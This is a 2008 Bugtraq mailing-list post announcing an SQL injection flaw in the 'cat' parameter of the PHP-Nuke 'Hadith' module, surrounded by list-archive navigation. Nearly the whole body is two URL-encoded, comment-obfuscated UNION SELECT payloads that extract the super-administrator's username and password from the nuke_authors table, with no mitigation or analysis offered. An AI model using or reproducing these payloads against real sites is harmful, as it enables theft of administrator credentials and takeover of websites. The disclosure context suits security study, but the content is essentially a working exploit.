[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

PHP-Nuke SQL injection Module "Hadith" [cat]

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHP-Nuke SQL injection Module "Hadith" [cat]
From: lovebug@xxxxxxxxxx
Date: 8 Mar 2008 20:13:16 -0000

R B T - 4     C R E W       www.rbt-4.net

-----------------------------------------------
AUTHOR : Lovebug
 


PHP-Nuke Module "Hadith"  [cat]         Sql injection 

Original Advisory: 
http://www.rbt-4.net/forum/viewthread.php?forum_id=51&thread_id=3078


Exploit

-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

Prev by Date: Re: Firewire Attack on Windows Vista
Next by Date: Firebird remote BOF POC
Previous by thread: [ MDVSA-2008:065 ] - Updated pulseaudio packages fix denial of service vulnerabilities
Next by thread: Firebird remote BOF POC
Index(es):
- Date
- Thread